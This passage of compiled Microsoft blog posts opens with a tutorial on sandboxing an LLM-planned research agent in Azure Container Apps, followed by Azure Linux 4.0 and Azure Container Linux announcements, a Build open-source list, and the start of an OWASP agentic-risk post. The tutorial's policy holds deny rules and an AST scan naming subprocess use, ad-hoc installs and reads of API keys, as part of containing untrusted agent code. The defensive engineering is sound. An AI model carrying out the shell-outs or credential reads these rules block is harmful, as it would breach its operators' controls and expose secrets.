import os from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument policy = PolicyDocument.from_yaml("policies/aca_research_agent.yaml") provider = ACASandboxProvider( resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ["AZURE_REGION"], disk="python-3.13", # constructor-level, not per-session ensure_group_location=os.environ["AZURE_REGION"], ) # create_session takes (agent_id, policy=..., config=...). The policy carries # the network allowlist and the CPU/memory/timeout defaults. handle = provider.create_session("research-agent-1", policy=policy) # execute_code takes (agent_id, session_id, code, *, context=...). # The timeout is read from the session config that was projected from # policy.defaults.timeout_seconds at create_session time. exec_handle = provider.execute_code( "research-agent-1", handle.session_id, "import urllib.request as u; print(u.urlopen('https://arxiv.org').status)", context={"intent": "smoke-test arxiv reachability"}, ) print(exec_handle.result.stdout) provider.destroy_session("research-agent-1", handle.session_id)

ACA Sandboxes hit the sweet spot for a production agent platform on Azure: managed (no nodes or Kubernetes to operate), regional and autoscaled, fast enough for per-session creation, integrated with VNet / managed identity / Log Analytics, and rich enough on Azure-native primitives that the AGT policy bundle can be rendered into platform-level controls automatically.

5. How ACASandboxProvider integrates with Agent governance toolkit policy

The provider's contribution to governance is that it makes a single PolicyDocument enforce in three different places, with the most expensive checks running last.

Before any Azure round-trip (host-side, in your process):

The host-side PolicyEvaluator (constructed once per session) evaluates deny rules over code / tool_name, tool_allowlist, and the per-call context. A deny becomes PermissionError. This runs on every execute_code call, so a denied step costs zero Azure cycles.
enforce_no_subprocess_execution then walks the snippet's AST and raises SandboxCodeViolation if subprocess.*, os.system, os.execve, os.spawn*, or wildcard imports of those modules appear. This catches the cases where a contains rule misses (e.g. obfuscated imports, from subprocess import Popen as p).

At sandbox creation (Azure-side, once per session):

aca_config_from_policy projects defaults.max_cpu / defaults.max_memory_mb onto the sandbox's CPU and memory ceilings.
network_allowlist plus defaults.network_default are turned into a typed EgressPolicy(default_action="Deny", host_rules=[EgressHostRule(pattern, action="Allow"), …]) and applied via SandboxClient.set_egress_policy. The policy is fail-closed by default — even with an empty allowlist you get a sandbox with no outbound network.

Per execution:

Azure-side, every call. The egress proxy enforces (4) on every outbound connection inside the sandbox. A blocked host produces an HTTP 403 inside the guest; the snippet's own error handler can detect that, and the provider's caller surfaces it as a blocked-at-egress outcome.
Host-side, post-exec tripwire. After SandboxClient.exec returns, the provider compares the measured duration_seconds against defaults.timeout_seconds and, if the budget was exceeded, sets result.killed=True and a kill_reason on the returned SandboxResult. This is an advisory marker, not a kill signal: the snippet has already finished, and the sandbox session itself stays alive and reusable. Acting on it (abandoning the session, surfacing a timeout decision) is the agent loop's job — see how run_step in section 6.3 turns it into a "timeout" receipt.

One PolicyDocument, six enforcement points, three different locations. The model is never trusted; each guarantee is enforced by the component closest to the resource it protects.

6. The example: an LLM-planned research agent

The agent does one thing: given a research ticket — a small JSON document like {"topic": "differential privacy", "depth": "survey"} — produce a short literature summary. To do that it needs to (a) read papers from arXiv, (b) skim associated GitHub READMEs, and (c) optionally query a local search index. Nothing else.

The interesting part is how the agent decides what code to run. A GPT-class planner is asked to break the ticket into a list of steps, each step a short Python snippet. Those snippets are then executed one at a time — each one passing through the six-point gauntlet from section 5.

6.1 Install

# agt-sandbox with the Azure provider + the policy engine pip install "agt-sandbox[azure,policy]" # Early-access Azure Container Apps sandbox SDK pip install azure-containerapps-sandbox # Optional: only needed for the LLM planner in section 5.3 pip install openai

One-time Azure setup (resource group must already exist — the provider auto-creates the sandbox group on first use, but not the resource group):

az login az group create --name agents-rg --location westus2 $env:AZURE_SUBSCRIPTION_ID = (az account show --query id -o tsv) $env:AZURE_RG = "agents-rg" $env:AZURE_REGION = "westus2"

Quick smoke check:

from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument print("ok")

Ignore the deprecated warning here. The packages are in the midst of migration and will be fixed soon.

6.2 The policy

aca_research_agent.yaml — every field is a native PolicyDocument field, no Python wrapper:

name: research-agent version: "2" defaults: action: allow max_cpu: 1.0 # → sandbox CPU cap = 1000 millicores max_memory_mb: 2048 # → sandbox memory cap = 2048 MiB timeout_seconds: 90 # per-execute_code wall-clock kill network_default: deny # fail-closed (also the schema default) network_allowlist: - api.openai.com - api.arxiv.org - export.arxiv.org - "*.github.com" - pypi.org - files.pythonhosted.org tool_allowlist: - fetch_arxiv - fetch_github_readme - search_index rules: - name: deny-shell-out-subprocess condition: { field: code, operator: contains, value: "subprocess" } action: deny priority: 100 message: "shell-out blocked by research-agent policy" - name: deny-pip-install condition: { field: code, operator: contains, value: "pip install" } action: deny priority: 100 message: "ad-hoc dependency installs are not permitted" - name: deny-secret-openai condition: { field: code, operator: contains, value: "OPENAI_API_KEY" } action: deny priority: 100 message: "agents may not read host credentials" # Tool-allowlist gate. Fires only when the eval context carries a # `tool_name` — untagged execute_code calls are unaffected. - name: deny-tool-not-in-allowlist condition: field: tool_name operator: not_in value: [fetch_arxiv, fetch_github_readme, search_index] action: deny priority: 200 message: "tool not in research-agent tool_allowlist"

Two properties to keep in mind:

Network is fail-closed. Any host not on network_allowlist is denied at the Azure egress proxy. An empty allowlist produces a sandbox with no outbound network.
tool_allowlist only fires when the call is tagged. Plain execute_code_async(...) has no tool_name. Calls that pass context={"tool_name": "evil_tool"} get denied host-side.

Validate before committing:

python -m agent_os.policies.cli validate aca_research_agent.yaml # OK

6.3 The agent

import asyncio, json, os, time, uuid from dataclasses import dataclass from agent_os.policies import PolicyDocument from agent_sandbox import ACASandboxProvider from openai import AsyncOpenAI @dataclass class Step: index: int; intent: str; code: str @dataclass class StepReceipt: step_index: int; intent: str decision: str # allowed | denied-by-policy | blocked-at-egress | timeout | error reason: str | None azure_sandbox_id: str duration_seconds: float stdout_excerpt: str PLANNER_SYSTEM = """You are a research planner. Output JSON of the form {"steps":[{"intent": str, "code": str}, ...]} where each `code` is self-contained Python using only the standard library (use urllib.request for HTTP, not requests). Snippets may reach: api.arxiv.org, export.arxiv.org, *.github.com, pypi.org. No installs, no shell, no secrets.""" async def plan(client: AsyncOpenAI, ticket: dict) -> list[Step]: resp = await client.chat.completions.create( model="gpt-4o-mini", response_format={"type": "json_object"}, messages=[ {"role": "system", "content": PLANNER_SYSTEM}, {"role": "user", "content": json.dumps(ticket)}, ], ) plan = json.loads(resp.choices[0].message.content) return [Step(i, s["intent"], s["code"]) for i, s in enumerate(plan["steps"])] async def run_step(provider, agent_id, session_id, step: Step) -> StepReceipt: started = time.monotonic() try: exec_handle = await provider.execute_code_async( agent_id, session_id, step.code, context={"step_index": step.index, "intent": step.intent}, ) except PermissionError as exc: return StepReceipt(step.index, step.intent, "denied-by-policy", str(exc), session_id, time.monotonic() - started, "") res = exec_handle.result combined = (res.stdout or "") + (res.stderr or "") egress_block = "egress-blocked" in combined or "HTTP Error 403" in combined if getattr(res, "killed", False): decision, reason = "timeout", getattr(res, "kill_reason", "timeout") elif egress_block: decision, reason = "blocked-at-egress", "Azure egress proxy denied a host" elif res.success: decision, reason = "allowed", None else: decision, reason = "error", (res.stderr or "").strip()[:200] return StepReceipt( step.index, step.intent, decision, reason, session_id, time.monotonic() - started, (res.stdout or "").strip()[:200], ) async def main(ticket_path: str) -> None: ticket = json.loads(open(ticket_path, encoding="utf-8").read()) policy = PolicyDocument.from_yaml("aca_research_agent.yaml") missing = [k for k in ("AZURE_SUBSCRIPTION_ID", "AZURE_RG") if not os.environ.get(k)] if missing: raise SystemExit(f"missing env vars: {', '.join(missing)}") provider = ACASandboxProvider( subscription_id=os.environ["AZURE_SUBSCRIPTION_ID"], resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ.get("AZURE_REGION", "westus2"), disk="python-3.13", ensure_group_location=os.environ.get("AZURE_REGION", "westus2"), ) if not provider.is_available(): raise SystemExit(provider.unavailable_reason) agent_id = f"research-{uuid.uuid4().hex[:6]}" handle = await provider.create_session_async(agent_id, policy=policy) try: steps = await plan(AsyncOpenAI(), ticket) receipts = [await run_step(provider, agent_id, handle.session_id, s) for s in steps] print(json.dumps([r.__dict__ for r in receipts], indent=2, default=str)) finally: await provider.destroy_session_async(agent_id, handle.session_id) if __name__ == "__main__": import sys asyncio.run(main(sys.argv[1]))

Run it against {"topic": "differential privacy", "depth": "survey"} and you get a JSON array of receipts on stdout — one per planner step. A typical five-step plan produces output along the lines of:

[ {"step_index": 0, "intent": "fetch arXiv search results", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 1.42, "stdout_excerpt": "{\"feed\": {\"entry\": [{\"id\": \"http://arxiv.org/abs/2201.12345v2\", ..."}, {"step_index": 1, "intent": "download README for top GitHub repo", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.88, "stdout_excerpt": "# opendp\n\nThe OpenDP Library is a modular collection..."}, {"step_index": 2, "intent": "shell out to grep README", "decision": "denied-by-policy", "reason": "Policy denied: shell-out blocked by research-agent policy", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.003, "stdout_excerpt": ""}, {"step_index": 3, "intent": "fetch related blog post from third-party site", "decision": "blocked-at-egress", "reason": "Azure egress proxy denied a host", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.41, "stdout_excerpt": "egress-blocked HTTPError HTTP Error 403: Forbidden"}, {"step_index": 4, "intent": "summarize collected abstracts", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.32, "stdout_excerpt": "Summary: differential privacy research in 2024-2026..."} ]

Three things to notice:

Step 2 (subprocess) was rejected host-side in ~3 ms with no Azure round-trip — duration_seconds and the empty stdout_excerpt confirm it never left the host process.
Step 3 went to Azure but the egress proxy returned HTTP 403; the caller's try/except converted that into a clean blocked-at-egress decision instead of a hard failure.
The session survives both rejections. Step 4 still runs to completion — denials and egress blocks do not poison the sandbox.

What you've enforced

Concern	Where enforced	Mechanism
Shell-out, pip-install, credential exfiltration	Host process	PolicyDocument deny rules → PermissionError
Subprocess invocation that slips past substring rules	Host process	enforce_no_subprocess_execution AST scan → SandboxCodeViolation
Calls to tools outside the allowlist	Host process	deny-tool-not-in-allowlist rule
Outbound traffic to disallowed hosts	Azure egress proxy	network_allowlist → EgressPolicy (Deny + per-host Allow)
CPU / memory ceiling	Azure sandbox VM	defaults.max_cpu / defaults.max_memory_mb
Per-step wall-clock tripwire	Host, post-exec (advisory)	defaults.timeout_seconds → SandboxResult.killed=True
Audit trail	Host process	Per-step receipts from run_step

The model is never trusted. Each guarantee is enforced by the component closest to the resource it protects, and a single signed PolicyDocument drives all of them.

Closing thoughts

A few things worth keeping in mind:

One PolicyDocument is the artefact. Host-side rules, AST scan, ACA egress proxy, CPU / memory caps, timeouts — all driven by one YAML file. Treat it like code: review it, diff it, and validate it in CI.
Fail-closed by default. ACA's network_default: deny is the setting you want. Every host the agent reaches should be in the allowlist, by name, in a reviewable diff.
Read the receipts. StepReceipt JSON is the audit trail. Pipe it into Log Analytics and alert on denied-by-policy and blocked-at-egress spikes — they're either attacks or planner regressions.
The model is never trusted. Every check in this post exists because the moment you trust the model, you've also trusted whatever fed it its last few tokens.

The project lives at github.com/microsoft/agent-governance-toolkit. Issues, PRs, and war stories welcome.

Announcing Azure Linux 4.0: Purpose-Built for Azure, Now in Public Preview

poorvinarang — Wed, 10 Jun 2026 20:56:42 GMT

Today at Microsoft Build, we're announcing the public preview of Azure Linux 4.0 - Microsoft's first party Linux distribution, purpose-built for Azure. Azure Linux 4.0 is available now for Azure Virtual Machines, VM Scale Sets, and container images – with Azure Kubernetes Service (AKS) support and Windows Subsystem for Linux (WSL) coming soon after.

Why Azure Linux

Running Linux on Azure often involves a mix of distributions - one for VMs, another for Kubernetes nodes, a third for container base images, and sometimes something different on developer machines. That flexibility is powerful, but it can also introduce operational overhead: multiple patch schedules to coordinate, multiple security baselines to validate, and more moving parts for SRE and security teams to stay ahead of. A more consistent baseline - especially one with a smaller footprint - can help reduce exposure and simplify day‑to‑day maintenance

Azure Linux was built with that principle in mind: a single, Microsoft-supported Linux foundation designed to work across every Azure compute surface. From kernel updates to CVE patches, Azure Linux is built and maintained by Microsoft with a predictable update cadence designed around Azure infrastructure. Azure Linux is included with Azure compute at no additional cost.

What Is Azure Linux 4.0

Azure Linux is a Fedora-derived, RPM-based Linux distribution built and maintained by Microsoft. It is open source, free to use, and optimized specifically for Azure. Minimal by choice, secure by default; Azure Linux ships only the packages required for cloud workloads. Azure Linux is built exclusively for cloud and server workloads, it is not intended to support desktop usage or GUI applications.

Azure Linux already powers millions of cores across Azure's internal services, including AKS, Azure SQL, Azure Cosmos DB, and many others. With 4.0, we're bringing the same OS - same security posture, same performance tuning, same operational simplicity - to every Azure customer.

When Azure Linux 4.0 reaches General Availability, you can expect seamless integration with the Azure services you already rely on, including:

Microsoft Defender for Cloud - vulnerability assessment and threat detection

Azure Monitor - telemetry, logs, and performance monitoring

Azure Migrate - discovery and migration tooling

Trusted Launch and Secure Boot - hardware-rooted security

Azure Portal, CLI, ARM, Bicep, Terraform, Ansible -deploy and manage with your existing tools

What's New in Azure Linux 4.0

Component	Version	What Changed
Kernel	6.18 LTS	Azure-tuned with new hardware drivers, improved Hyper-V integration, GPU/AI accelerator support
Package Manager	dnf5	Complete rewrite from python to reduce dependencies, faster package resolution, lower memory usage
glibc	2.42	This includes performance improvements in string ops, memory allocation, thread handling
OpenSSL	3.5	This release includes post-quantum cryptography support, improved QUIC support, and other crypto updates.
systemd	258	Faster boot sequences, improved service management
Python	3.14	JIT compiler, new syntax features
RPM	6.0	Modernized database backend, improved signature verification
FIPS 140-3	In progress	Will be available at GA.

Azure Linux on Virtual Machines

Deploy Azure Linux 4.0 directly from the Azure Marketplace on any Azure VM or VM Scale Set. Azure Linux images are validated across Azure VM SKUs and tuned for Azure compute, storage, and networking delivering faster VM startup and provisioning with a reduced package footprint.

Whether you're running web applications, databases, or GPU-accelerated AI/ML workloads, Azure Linux provides a consistent, secure foundation with no additional OS licensing cost. You pay only for the underlying Azure compute resources.

Deploy your first Azure Linux VM in minutes from the Azure Marketplace.

Azure Linux on Azure Kubernetes Service

Azure Linux has been the container host for AKS since 2023, already powering mission-critical Kubernetes workloads at massive scale. With 4.0, we're also introducing Azure Container Linux (ACL) an immutable, container optimized variant for environments with stricter security and compliance requirements. To learn more about Azure Container Linux, see ACL blogpost.

	Azure Linux (General purpose)	Azure Container Linux (ACL)
Update model	Package-based (dnf5)	Image-based, immutable, auto-updating
Customization	Full package management	Locked-down, minimal surface
Best for	General AKS workloads	Regulated, high-security environments
SELinux	Supported	Enforcing by default

Both options share the same kernel, security update cadence, and Azure integration; fully supported by Microsoft, end to end.

Azure Linux Container Images

Build and run containerized applications on Microsoft-maintained base images from the same Azure Linux supply chain. One Linux experience from VMs to containers with the same security updates, same compliance posture, and same operational model.

Image Type	Use Case
Base	Full flexibility - install any packages you need
Runtime (Python, Node.js, Java, .NET) [Not available at Preview]	Pre-configured for your language stack
Distroless	Minimal attack surface - no shell, no package manager

All images are available on Microsoft Container Registry (MCR) and follow the same monthly security update cadence as Azure Linux VM images.

Azure Linux on WSL

Familiar Linux, optimized for Azure. Develop locally on the same Linux you run in production. Azure Linux for Windows Subsystem for Linux brings your production OS to your developer workstation, eliminating environment drift and giving your team a consistent dev-to-cloud workflow.

Azure Linux for WSL will be available shortly after Build.

Secure by Default, Backed by Microsoft

Security is not an add-on in Azure Linux; it's foundational. Built with security in mind from day one, Azure Linux applies defense-in-depth from the kernel through to the supply chain. A reduced package footprint means fewer vulnerabilities to manage, and Microsoft's ownership of the full supply chain enables fast-track CVE response. Below is a summary of security capabilities that you should expect to see in Azure Linux at the time of general availability.

Capability	Details
Secure Boot & Trusted Launch	Signed shim, GRUB, kernel, and systemd-boot.
SELinux	Supported on all images. Enforcing by default.
FIPS 140-3	Certification in progress. Built-in crypto module support.
Kernel hardening	ASLR, stack protection, seccomp, systemd service sandboxing.
Supply chain security	All packages and repos cryptographically signed. SBOMs published.
Identity	Entra ID SSH support.
CVE response	Microsoft-owned supply chain enables fast-track Critical/High CVE patches.
Lifecycle	LTS kernels maintained for lifetime of the distribution.

Day-1 Ecosystem Partner Support

Azure Linux already has validated support from a broad ecosystem of security, monitoring, networking, and data partners via AKS and VM support:

Dynatrace — Application performance monitoring and observability
Aquasec – database platform support
Qualys — Vulnerability management, compliance scanning, and asset inventory
Isovalent — eBPF-powered networking, security, and observability via Cilium
Elastic — Log analytics, infrastructure monitoring, and SIEM/XDR
Upwind — Runtime cloud security and behavioral threat detection
SAP — Enterprise workload certification for S/4HANA and NetWeaver
Databricks — Data and AI platform powering lakehouse workloads at scale
Arm — Native Arm64 architecture support for cost-efficient cloud compute

Proven at Scale

Azure Linux isn't new; it has been running production workloads at massive scale across Azure's internal services and early adopters.

Azure Linux has been powering production workloads at massive scale since 2022 across AKS, Azure SQL, Azure Cosmos DB, and other core Azure services along with LinkedIn and Databricks. With version 4.0, we're building on that proven foundation with a modernized stack, expanded compute surface support, and a new Fedora-derived base, bringing the same reliability our internal services depend on every Azure customer.

Databricks

Databricks migrated over 100,000 VMs and more than 1 million CPU cores to Azure Linux with zero customer-facing incidents. The migration eliminated separate hardened images by leveraging Azure Linux's built-in FIPS support and delivered measurable performance gains: 27% faster image pull times and approximately 5% faster query execution across their serverless compute fleet.

LinkedIn

LinkedIn completed a major stack upgrade, migrating to Azure Linux 3 across their infrastructure. The transition enabled adoption of configuration as code and modern kernel integration, resulting in a more resilient, secure, and future-proof environment. LinkedIn's Grid team reported significant performance improvements following the migration.

Predictable Lifecycle and Updates

Patch faster. Operate simpler. Azure Linux follows a clear, predictable lifecycle designed for teams running large Azure fleets:

LTS kernel - Maintained with monthly CVE backports.

HWE kernels - Introduced annually for new hardware platforms, GPU, and AI accelerator enablement.

Predictable updates - Packages (language runtimes, tools) are refreshed in predictable windows. Between windows, only critical/high CVE patches are backported.

Monthly security updates - Predictable cadence for all supported packages.

For full details on the lifecycle model, kernel tracks, and package tiers, see the Azure Linux Release Cadence and Lifecycle documentation.

Get Started

Azure Linux 4.0 is available now in public preview. Choose the path that fits your workload:

Scenario	How to Start
Azure Virtual Machines	Deploy from Azure Marketplace via Portal, CLI, ARM, Bicep, or Terraform
Azure Kubernetes Service [Not available at Preview]	Set --os-sku to AzureLinux when creating a node pool
Container Images	Pull from Microsoft Container Registry (MCR)
WSL [Not available at Preview]	wsl --install -d AzureLinux

Learn More

//Build Session: Build, deploy, and run Linux workloads on Azure
Azure Linux documentation
To learn more and get started, visit aka.ms/AzureLinuxProduct
Azure Linux on GitHub
Release notes
Joining the ISV partner program: AzureLinuxPartners@microsoft.com

We're excited to put Azure Linux in your hands. Try it today and let us know what you think.

Introducing Azure Container Linux (ACL)

FloraTaagen — Tue, 02 Jun 2026 20:00:00 GMT

Today at Microsoft Build 2026, we’re announcing the general availability of Azure Container Linux (ACL): a secure, immutable container host designed to help platform teams run Kubernetes workloads at scale on Azure Kubernetes Service (AKS) with greater consistency, reduced operational overhead, and a stronger default security posture.

This release builds on Microsoft’s long-standing commitment to the Flatcar Container Linux ecosystem as a foundation for secure, minimal, and container-optimized operating systems. This commitment includes the acquisition of Kinvolk in 2021, bringing deep expertise in Flatcar development and cloud-native systems into Azure, and the subsequent donation of Flatcar to the Cloud Native Computing Foundation (CNCF), ensuring its continued growth as a community-driven project.

Flatcar has played a critical role in helping customers run cloud-native infrastructure at scale, introducing an immutable, minimal OS model that reduces configuration drift, minimizes attack surface, and simplifies lifecycle management. As customer needs continue to grow, there is an increasing demand for deeper integration with cloud platforms, stronger default security enforcement, and a more tightly managed supply chain experience in managed environments like AKS.

Building on this foundation, Azure Container Linux (ACL) represents the next evolution of this approach. ACL is intentionally built downstream of Flatcar to preserve compatibility with its ecosystem and leverage its mature, battle-tested design. ACL integrates Azure Linux binaries as the core foundation, providing consistency and compatibility with other Azure Linux use cases (including Azure Linux VMs), while bringing enterprise-hardened security and supportability into the platform. Looking ahead, ACL will further incorporate optional advanced code integrity capabilities from Azure Linux with OS Guard.

We remain committed to the Flatcar community and will continue contributing innovations upstream while bringing a fully managed, enterprise-ready product to customers through ACL.

Why a Trusted, Immutable Host Model Matters for AKS

As Kubernetes adoption scales, platform teams face increasing complexity in managing node-level consistency, security, and lifecycle operations across large fleets. Traditional OS models introduce challenges such as:

Configuration drift across nodes, leading to inconsistent behavior and harder-to-debug issues
Fragmented update mechanisms that increase operational overhead and risk during upgrades
Expanding attack surface due to unnecessary packages and mutable system state
Limited visibility and guarantees around the provenance and integrity of OS components

In managed environments like AKS, these challenges are amplified as teams look to operate clusters reliably at scale while meeting stricter security and compliance requirements.

Azure Container Linux: Built for Consistency and Trust

ACL addresses these challenges with a fully image-based operating system model that eliminates configuration drift, ensuring consistent behavior across nodes.

Updates are delivered through AKS node image upgrades, providing a consistent and repeatable way to roll out OS changes across clusters without relying on in-place modifications. By standardizing how nodes are built, updated, and operated, ACL helps ensure clusters remain in a known-good, reproducible state over time, even as they scale.

Over time, this model will continue to evolve to support A/B update mechanisms to further improve reliability, speed, and operational efficiency.

Secure from the Start, and Designed for the Future

ACL is engineered with a hardened security posture from the moment it boots. Its immutable design protects the integrity of the operating system, prevents unauthorized changes, and ensures consistent, reproducible behavior across your Kubernetes fleet. By removing unnecessary components and tightly constraining how the system can be modified, ACL reduces the attack surface and provides a strong foundation for running production workloads with confidence.

Under the hood, ACL incorporates several safeguards that reinforce its secure-by-default model:

Read-only /usr filesystem to prevent tampering with core system components.
A minimal package set purpose-built for container workloads, reducing CVE exposure.
Mandatory access control with SELinux, enforcing strict least-privilege policies.
Trusted Launch using a Unified Kernel Image (UKI) to bundle the kernel, initramfs, and kernel command line into a single signed artifact, ensuring integrity from the earliest stage.
Signed Azure Linux RPMs delivered through a trusted, end-to-end Microsoft supply chain.

Going forward, we will continue to evolve ACL’s security posture as we bring over additional innovations from Azure Linux with OS Guard. This includes integrating code integrity into the ACL image, using the Integrity Policy Enforcement (IPE) Linux security module, to ensure that only binaries from trusted, signed volumes are allowed to execute. IPE will also extend to container images, ensuring that only binaries matching a trusted signature can be executed from verified dm-verity backed layers.

Where applicable, we are committed to contributing these advancements upstream to the Flatcar project, helping strengthen the ecosystem and ensuring that improvements benefit the broader cloud-native community.

Differentiating between Azure Container Linux and Existing Container Hosts on AKS

AKS now provides multiple generally available Linux OS options, including general-purpose container hosts (Azure Linux and Ubuntu) and an immutable container host (Azure Container Linux).

While all options are fully supported by Microsoft, they are designed to address distinct operational and security use cases. The sections below highlight the key differences to help you choose and position the right OS for your scenario.

	General Purpose OS	Azure Container Linux
Filesystem	Writable (read-write)	Immutable (read-only) /usr with dm-verity guarantees
Focus on	Extensibility, flexibility, and choice.	Out of the box security and compliance guarantees.
Mandatory Access Control	AppArmor (optional)	SELinux (enforcing by default)*
Secure Boot	Optional (supported with certain VM sizes)	Supported by default with UKI (Unified Kernel Image)
Updates	Package and Image based updates supported	Only image-based updates supported (A/B update support on the roadmap)

*SELinux policies are subject to change over time based on customer feedback.

Day‑1 Ecosystem Partner Support

Azure Container Linux is launching with support from a broad ecosystem of security, monitoring, networking, and data partners. The following partners are expected to offer support or validated integrations at Day‑1 availability:

Dynatrace – application performance monitoring and observability.
Aquasec – database platform support on ACL.
Qualys - vulnerability, compliance, and container security.
Upwind - runtime cloud security and risk prioritization.
Elastic - logs, metrics, and observability for Kubernetes.
Isovalent – Kubernetes networking, observability, and security powered by eBPF (Cilium).

If you’re interested in becoming a supported Azure Container Linux partner, please reach out to: AzureLinuxPartners@microsoft.com

What Customers Are Saying

Early customer feedback highlights the real‑world impact of Azure Container Linux on improving security posture and operational consistency at scale.

“We’ve found working closely with the Microsoft product team throughout the Azure Container Linux preview to be invaluable. The product's immutability, minimal footprint, and built‑in security controls (such as SELinux and Trusted Launch) will strengthen our AKS security posture across every deployment instance in Nationwide. Furthermore, its focus on secure‑by‑design foundations is especially timely as we face advanced threat detection capabilities within the industry.” - Enterprise Container Platform, Cloud - Nationwide

Engineered for AKS from Day One

Azure Container Linux is deeply integrated with AKS to ensure a seamless operational experience. It is compatible with many critical AKS extensions and add‑ons, and works smoothly with existing application containers and deployment workflows. ACL is available across AMD64 and Arm64 architectures, ensuring consistent behavior across environments, and includes support for GPU-enabled workloads.

Enabling ACL is as simple as specifying the following in your node pool configuration:

--os-sku AzureContainerLinux

Command to provision an Azure Container Linux cluster on AKS using Azure CLI

Whether you're onboarding new clusters or migrating existing ones, ACL is designed to integrate into your environment with minimal friction.

A Clear Path Forward for AKS Preview Users

With the release of Azure Container Linux, AKS will transition to offer one unified immutable host offering. This work started with our use of Flatcar Container Linux in Preview and now continues with the GA release of ACL. As part of this release, Flatcar will no longer be available via --os-sku on AKS. Please note, this change applies specifically to the AKS preview experience; Flatcar is not being retired.

Later this year we will complete the convergence of our immutable OS offerings by incorporating remaining kernel and runtime features of the current OS Guard preview into ACL. At that time, existing users of OS Guard will receive a guided transition to ACL, ensuring operational continuity while consolidating to a single container host.

Get Started with Azure Container Linux

ACL is GA and available today for all AKS customers. To begin using ACL in your clusters and explore documentation, best practices, and deployment guidance, visit: aka.ms/azurecontainerlinux

ACL represents the future of secure, cloud-optimized Linux on AKS—building on the proven foundation of Flatcar, advancing it with Azure Linux innovations, and contributing back to the open-source ecosystem that customers depend on.

We’re thrilled to bring this new foundation to our customers and can’t wait to see what you build with it.

Learn More

//Build Session: Build, deploy, and run Linux workloads on Azure
Azure Container Linux documentation: https://aka.ms/azurecontainerlinux
Azure Container Linux on GitHub: https://github.com/microsoft/azure-container-linux
Azure Linux product page: https://aka.ms/AzureLinuxProduct
Azure Linux documentation: https://aka.ms/azurelinux
Joining the ISV partner program: AzureLinuxPartners@microsoft.com

Four open source projects to explore at Microsoft Build

leereilly — Fri, 29 May 2026 17:34:29 GMT

Open source is where developers experiment, collaborate, and turn new ideas into tools that others can build on. At Microsoft Build, we’re creating a dedicated space for that energy: the Open Source Zone.

This year, the Open Source Zone will bring together maintainers, contributors, and developers working on some of the most interesting open source projects in AI. Whether you’re building agents, experimenting with local models, exploring prompt workflows, or looking for practical ways to bring AI into your development process, this is a place to meet the people behind the projects and see what they’re building.

The Open Source Zone is inspired by similar community spaces we’ve hosted at GitHub Universe: hands-on, conversation-driven, and centered on the people and projects moving open source forward.

Meet the projects

OpenClaw

OpenClaw, originally Clawbot, formerly Clawdbot and briefly Moltbot,before landing on its current name (because naming is hard), is a personal AI assistant project built for developers who want more control over how AI agents run across tools, devices, and workflows. Its repository describes it as “your own personal AI assistant” across operating systems and platforms, with support for agent workspaces, skills, and device nodes.

It has also become one of the fastest-growing open source projects on GitHub, with over 370,000 stars to date.

At the Open Source Zone, attendees can learn how OpenClaw approaches personal agents, extensibility, and local-first experimentation.

AutoGPT

AutoGPT is one of the best-known open source projects in the autonomous agent space. The project’s mission is to make AI accessible for everyone to use and build on, with tools for building, testing, and delegating work to agents.

Visit AutoGPT in the Open Source Zone to learn how the project is evolving agent development, benchmarking, frontend experiences, and practical workflows for building agent-powered applications. Come for the autonomous agents; stay for the very human maintainers.

AutoGPT is also a member of GitHub’s Secure Open Source Fund, with a goal of enhancing AI security across the open source ecosystem.

Open WebUI

Open WebUI is a self-hosted, extensible AI platform for working with large language models. The project supports Ollama and OpenAI-compatible APIs and includes built-in RAG capabilities, making it a strong option for developers and organizations exploring local, private, or provider-flexible AI experiences.

At Build, the Open WebUI team will show how developers can run, customize, and extend AI interfaces for their own environments.

prompts.chat

prompts.chat, formerly Awesome ChatGPT Prompts, is a curated collection of prompt examples for AI chat models. The project is designed to help people discover, share, and build better prompts for modern AI assistants.

Created by Fatih Kadir Akın, a GitHub Star from Istanbul, prompts.chat reflects his work at the intersection of open source, developer education, and AI-assisted development. Fatih leads Developer Relations at Teknasyon, has authored books on JavaScript and prompt engineering, and is active in the community as a speaker, organizer, and contributor.

Stop by to explore prompt libraries, prompt engineering resources, self-hosting options, and ways the community is making prompting more reusable and collaborative.

Register for Microsoft Build

Microsoft Build takes place June 2–3, 2026, in San Francisco and online. In-person passes are available, and online registration is free for livestreamed keynote and select session access.

Register for Microsoft Build and come visit the Open Source Zone to meet the teams behind OpenClaw, AutoGPT, Open WebUI, and prompts.chat.

We’ll see you there. <3

Governing AI Agents Against Every OWASP Agentic Risk: A Deep Dive with the Agent Governance Toolkit

mosiddi — Thu, 28 May 2026 22:04:55 GMT

AI agents are moving from prototypes to production. They book flights, write code, negotiate contracts, and operate across enterprise systems with minimal human oversight. The attack surface is not theoretical: OWASP has catalogued the top 10 risks specific to agentic applications, and every one of them maps to a real-world failure mode.

The Agent Governance Toolkit (AGT) is an open-source, MIT-licensed framework that enforces deterministic governance at runtime, before every tool call, message, and action an agent takes. This is not prompt engineering or guardrails bolted on after the fact. AGT provides policy-as-code enforcement, zero-trust identity, execution isolation, and tamper-evident audit trails across the full agent lifecycle.

In this post, we walk through all 10 OWASP Agentic risks with real code from the AGT repository. By the end, you will have concrete examples for every risk category and a clear path to production-grade agent governance.

Coverage at a Glance

#	OWASP Risk	AGT Component	Key Mechanism
ASI-01	Agent Goal Hijack	Agent OS	Policy Engine + Action Interception
ASI-02	Tool Misuse & Exploitation	Agent OS	Capability Sandboxing + Input Sanitization
ASI-03	Identity & Privilege Abuse	AgentMesh	DID Identity + Trust Scoring
ASI-04	Supply Chain Vulnerabilities	AgentMesh	AI-BOM (Model + Data + Weights Provenance)
ASI-05	Unexpected Code Execution	Agent Runtime	Execution Rings (Ring 0-3)
ASI-06	Memory & Context Poisoning	Agent OS	VFS Policies + CMVK Verification
ASI-07	Insecure Inter-Agent Comms	AgentMesh	IATP + E2E Encrypted Channels
ASI-08	Cascading Agent Failures	Agent SRE	Circuit Breakers + SLOs
